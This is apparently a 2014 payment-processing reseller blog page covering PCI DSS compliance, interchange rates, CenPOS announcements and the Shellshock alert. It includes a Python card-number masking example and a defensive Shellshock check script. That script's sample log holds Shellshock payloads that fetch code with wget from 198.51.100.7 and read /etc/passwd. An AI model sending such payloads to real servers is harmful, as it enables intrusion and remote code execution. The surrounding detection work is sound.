PCI SECURITY STANDARDS COUNCIL PUBLISHES SECURITY AWARENESS GUIDANCE

October 30, 2014. In order for an organization to comply with PCI DSS Requirement 12.6, a formal security awareness program must be in place. There are many aspects to consider when meeting this requirement to develop or revitalize such a program. The best practices included in this information supplement are intended to be a starting point for organizations without a program in place, or as a minimum benchmark for those with existing programs that require revisions. Best Practices for Implementing a Security Awareness Program v1.0 is a 25-page PDF recommended for IT and PCI compliance leaders.

One of the biggest risks to an organization’s information security is often not a weakness in the technology control environment. Rather, it is the action or inaction of employees and other personnel that leads to security incidents.

The free guidance will help merchants establish security standards in their business.

3D Merchant Services Powered by CenPOS
2633 NE 26th Ave, Metro South Florida, FL 33064 USA
954-942-0483

PCI DSS version 3.0: January 2015 Deadline Looms

Merchants who submit annual SAQs can continue to validate compliance with the 2.0 SAQs until January 1, 2015. If a merchant’s annual validation falls in December, it is not mandated to validate with version 3.0 until December 2015.

Are you ready? Every merchant is impacted by the updates, which are considerable. The PCI DSS Quick Reference Guide is 40 pages, so there will be no attempt to duplicate it here. Here are some issues merchants most likely need to address:

  1. Maintain an inventory of system components that are in scope for PCI DSS (Requirement 2.4), and protect card-reading devices from tampering and substitution (Requirement 9.9). Merchants have to identify all software, hardware and networks, what each is used for and why it is needed. This is a difficult task for larger retail operations where equipment is regularly moved and replaced. To comply, there must be a plan to regularly inspect equipment and verify serial numbers.
  2. Ensure that related security policies and operational procedures are documented, in use, and known to all affected parties. Even where policies exist, it is rare that every employee is fully informed. Adding a component to HR employee reviews is the simplest way to initiate a system.
  3. Render PAN unreadable anywhere it is stored; the card number must be unreadable per Requirement 3.4.
  4. The CAV2/CVC2/CVV2/CID can never be stored after authorization (Requirement 3.2.2). OK, this one is old, but it’s still abused, so it is being repeated. It is NOT OK to store it even ‘for a while’.
  5. Control physical access for on-site personnel (Requirement 9.3); access must be authorized, based on individual job function, and revoked immediately upon termination. The vast majority of companies have little control over employee access by job function; their equipment or software simply has too many limitations. Merchants need to manage closely what employees can do, and document each employee’s interactions (who processed which transaction, etc.).
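Items 3 and 4 describe what must happen to card data at rest. The following is an added example, not CenPOS or PCI SSC code, showing in Python two of the methods Requirement 3.4 permits for rendering PAN unreadable (truncation, and a one-way keyed hash), a record sanitizer that drops sensitive authentication data such as CVV2 before anything is persisted, and a Luhn-based scrubber so a PAN does not survive readable in application logs. The key HASH_KEY, the field names, the sample transaction and the sample log line are assumptions constructed for the example; 4111111111111111 is a well-known test PAN.

```python
"""Rendering PAN unreadable at rest and keeping sensitive authentication data out
of storage. Added example, not CenPOS or PCI SSC code; the key, field names and
sample data below are assumptions constructed for illustration."""
import hashlib
import hmac
import re

# Assumed secret for the keyed one-way hash. In production it lives in an HSM or
# key-management service under PCI DSS Requirements 3.5/3.6, never in source.
HASH_KEY = b"example-key-replace-with-hsm-managed-secret"

# Sensitive authentication data that may never be stored after authorization
# (Requirement 3.2): card security code, full track data, PIN block.
# The field names are assumptions for this example.
SENSITIVE_AUTH_FIELDS = {"cvv2", "cvc2", "cav2", "cid", "track1", "track2", "pin_block"}

# 13-19 digits, optionally separated by spaces or hyphens, not embedded in a longer number.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit test; every real PAN passes it, most random numbers do not."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Truncate to at most the first six and last four digits (the Requirement 3.3 display limit)."""
    digits = re.sub(r"\D", "", pan)
    if not 13 <= len(digits) <= 19:
        raise ValueError("not a PAN length")
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def pan_hash(pan: str) -> str:
    """Keyed one-way hash (HMAC-SHA256) of the full PAN: a lookup value that cannot be
    reversed without HASH_KEY, one of the Requirement 3.4 options."""
    digits = re.sub(r"\D", "", pan)
    return hmac.new(HASH_KEY, digits.encode(), hashlib.sha256).hexdigest()


def sanitize_for_storage(txn: dict) -> dict:
    """Return a copy of a transaction record that is safe to persist: sensitive
    authentication data dropped, the clear PAN replaced by masked and hashed forms."""
    clean = {k: v for k, v in txn.items() if k.lower() not in SENSITIVE_AUTH_FIELDS}
    if "pan" in clean:
        pan = clean.pop("pan")
        clean["pan_masked"] = mask_pan(pan)
        clean["pan_hash"] = pan_hash(pan)
    return clean


def find_pans(text: str) -> list:
    """Return the Luhn-valid candidate PANs found in free text such as a log line."""
    hits = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"\D", "", m.group())
        if luhn_ok(digits):
            hits.append(digits)
    return hits


def scrub_log_line(line: str) -> str:
    """Replace every candidate PAN in a log line with its masked form, so logs never
    hold a readable PAN (Requirement 3.4 covers logs as well as databases)."""
    def repl(m):
        digits = re.sub(r"\D", "", m.group())
        return mask_pan(digits) if luhn_ok(digits) else m.group()
    return PAN_RE.sub(repl, line)


if __name__ == "__main__":
    # Constructed sample record; 4111111111111111 is a well-known test PAN.
    record = {"pan": "4111 1111 1111 1111", "cvv2": "123", "expiry": "12/16", "amount": "10.00"}
    print(sanitize_for_storage(record))
    print(scrub_log_line("auth ok card=4111-1111-1111-1111 amt=10.00"))
```

Two caveats a practitioner should keep in mind: the hash key must be protected like an encryption key, and Requirement 3.4 notes that holding both the truncated and the hashed form of the same PAN lets an attacker reconstruct it far more cheaply, so where both exist (as in the record above) additional controls are needed to keep them from being correlated. Index tokens issued by a tokenization service, such as the CenPOS tokenization described elsewhere on this page, are a third Requirement 3.4 option that avoids storing any derivative of the PAN in the merchant environment.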

Goals of the PCI Data Security Standard
  • Build and maintain a secure network
  • Protect cardholder data
  • Maintain a vulnerability management program
  • Implement strong access control measures
  • Regularly monitor and test networks
  • Maintain an information security policy

PCI is an ongoing 3-step process
  • Assess – identifying cardholder data, taking an inventory of your IT assets and business processes for payment card processing, and analyzing them for vulnerabilities.
  • Remediate – fixing vulnerabilities and not storing cardholder data unless you need it.
  • Report – compiling and submitting required reports to the acquiring bank and card brands you do business with.

CenPOS Certifies to Caribbean Credit Card Corporation

Miami, FL (PRWEB) October 27, 2014

Today, CenPOS proudly announces a new certification with Caribbean Credit Card Corporation. The certification includes card-present, card-not-present, e-commerce, and mobile processing. Merchants residing in countries where Caribbean Credit Card Corporation has a processing relationship with local banks are now able to take advantage of the CenPOS suite of products and services, including but not limited to mobile processing, Electronic Bill Presentment and Payment, integrated shopping carts, point-to-point encryption and tokenization. Cross-border merchants are now able to manage their business payment needs through one single payment platform. CenPOS provides businesses across the globe with an omni-channel payment platform, allowing the business community to better engage their clients and allowing those clients to pay from anywhere, anytime, however they want to pay.

“We are very excited with this new certification as it brings us closer to our quest to provide our clients with global processing solutions with a world class platform,” said German Gonzalez, Chief Technology Officer and Co-Founder of CenPOS. “CenPOS will continue to add new certifications that are strategic and complementary to our current product offering, but more importantly, certifications that are required by our valued clients,” added Gonzalez.

CenPOS is now able to provide core payment processing services in the following Caribbean countries:

Anguilla, Saint Kitts and Nevis, Antigua and Barbuda, Saint Lucia, Saint Vincent, Guyana, Barbados, Dominica, Grenada, Suriname, and Montserrat

About CenPOS

CenPOS is a merchant-centric, end-to-end payments engine that drives enterprise-class solutions for businesses, saving them time and money, while improving their customer engagement. CenPOS’ secure, cloud-based solution optimizes acceptance for all payment types across multiple channels without disrupting the merchant’s banking relationships. For additional information please call 877.630.7960.

###

3D Merchant Services is an authorized CenPOS Reseller, Global Sales (954) 942-0483.

Visa interchange rate October 2014 release

The Visa Fall 2014 interchange reimbursement rate release is now available for PDF download. At a glance, I didn’t spot any changes to rates, following the broad changes and increases for business-to-business since April 2013.

The transaction and volume minimums did increase for the Credit Performance Threshold, but the maximum chargeback ratio remains the same at 0.020%.

New higher minimums for credit performance threshold.

For merchants, no news is good news! If your company is business-to-business, managing interchange is critically important. The Business Electronic Interchange Reimbursement Fee (EIRF) rate increased from 2.75% to 2.95% in the last year. Merchants can avoid EIRF and Standard with improved interchange qualification management.

Click here for a handy web page with links to all credit card brand rates. As of October 21, 2014, MasterCard has not released an update for Fall; however, the spring update is labeled 2014 – 2015, so perhaps there will not be one.

US Homeland Security Alerts: “Shellshock” Vulnerability

Over one thousand merchants have been impacted by issues for which the US Computer Emergency Readiness Team (US-CERT) has issued alerts.

‘Shellshock’ (CVE-2014-6271) is a critical vulnerability reported in the GNU Bourne-Again Shell (Bash), the common command-line shell used in many Linux/UNIX operating systems and Apple’s Mac OS X.

The PCI Security Standards Council released an alert for merchants: https://www.pcisecuritystandards.org/pdfs/14_10_15%20PCI%20SSC%20Bulletin%20on%20Shellshock_Final.pdf
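For merchants who run their own web or back-office servers, two practical checks follow. This is an added example, not material from US-CERT, the PCI SSC or CenPOS: a POSIX shell script that first tests whether the local bash still executes the trailing command smuggled in through a crafted environment variable (the CVE-2014-6271 behaviour), and then counts web-server access-log lines that carry the exploit signature in request headers. The log lines are constructed sample data and the function names are assumptions for this example.

```shell
#!/bin/sh
# Added example (not from US-CERT, the PCI SSC or CenPOS): two quick Shellshock
# (CVE-2014-6271) checks a merchant's IT staff can run on a Linux/UNIX host.

# 1. Is the local bash still vulnerable?  The crafted environment variable is a
#    function definition followed by an extra command; an unpatched bash runs
#    that command ("echo vulnerable") while importing the function, a fixed
#    bash does not.  Return codes: 0 = patched, 1 = vulnerable, 2 = no bash.
shellshock_check() {
    command -v bash >/dev/null 2>&1 || return 2
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) return 1 ;;
        *)            return 0 ;;
    esac
}

# 2. Count access-log lines carrying the exploit signature.  Bash only treats an
#    imported variable as a function when its value starts with exactly "() {",
#    so a fixed-string search for that prefix in request headers (User-Agent,
#    Referer, Cookie, ...) is precise.  $1 = path to the log file.
count_shellshock_hits() {
    grep -c -F '() {' "$1" || true   # grep exits 1 on zero matches; still print the 0
}

# Constructed sample log in combined log format (demonstration data, not real traffic).
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [26/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.7/x'"
203.0.113.9 - - [26/Sep/2014:10:12:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.23 - - [26/Sep/2014:10:13:44 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :; }; /bin/cat /etc/passwd" "curl/7.35.0"
EOF

rc=0
shellshock_check || rc=$?
case $rc in
    0) echo "local bash: patched" ;;
    1) echo "local bash: VULNERABLE to CVE-2014-6271" ;;
    *) echo "local bash: not installed" ;;
esac
echo "exploit attempts in sample log: $(count_shellshock_hits "$SAMPLE_LOG")"
```

Run the script on each host that exposes CGI scripts, SSH forced commands, or DHCP clients, since those are the paths through which attacker-controlled strings reach bash's environment; a hit in the log scan means someone already tried, and the host's patch status and any spawned processes should be checked as part of the incident response the PCI SSC bulletin asks for.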

Identify transaction using token vs without token : CenPOS FAQ

Segment of a receipt that identifies whether a token was used for a credit card transaction via CenPOS.

Is there a CenPOS report that I can print that shows whether a token was used rather than a credit card number being keyed? Yes, by pulling a Repeat Sale report. All transactions using a token are sent with the “Repeat Sale” process indicator, in accordance with card acceptance rules. For on-demand reports, log in to the virtual terminal.

  • Choose Reports> Reprint to include all attempted transactions.
  • Choose Reports> Transactions to include only settled transactions.
If you don’t see the “Processed” column in reports, click the show/hide columns button shown at far right.

To view only transactions in which a token was used, enter “repeat” in the filter field.

Use the icons in the upper right of the report to print, or to export and paste into Excel. Do you need this report regularly? With the executive dashboard report writer, create a report with any criteria and have it automatically delivered to any email group on any schedule.

CenPOS Achieves SSAE 16 Type II Compliance

Miami, FL (PRWEB) September 29, 2014

CenPOS Enhances Security and Safety of Cardholder Data in Cloud-based Engine with SSAE 16 type II compliance

CenPOS, a leading payment-processing provider with data center facilities in Miami, Florida and Culpeper, Virginia, announced today that it has achieved Statement on Standards for Attestation Engagements (SSAE) 16 Type II compliance. SSAE 16 Type II compliance demonstrates CenPOS’s ability to exceed security, compliance and safety-related requirements for controls and safeguards when hosting customer data.

Critical components of obtaining this attestation include the ability to assess and reduce risk, support business continuity and provide customers with controlled security measures. The assessment process involves SOC reports prepared by an independent auditor under standards issued by the American Institute of Certified Public Accountants (AICPA). These standardized reports review multiple aspects of the organization: CenPOS’s internal control over financial reporting (ICFR, the subject of a SOC 1 report) and security, availability, processing integrity, confidentiality and privacy (the AICPA Trust Services Principles, examined under AT Section 101).

“Exceeding SSAE 16 requirements across all of our datacenters, as well as SOC requirements across our cloud and managed services platform, further demonstrates our commitment to the highest standards of operational excellence and to consistently delivering best-of-breed, intelligent datacenter solutions to all our customers,” comments German Gonzalez, Chief Technology Officer and Co-founder.

###
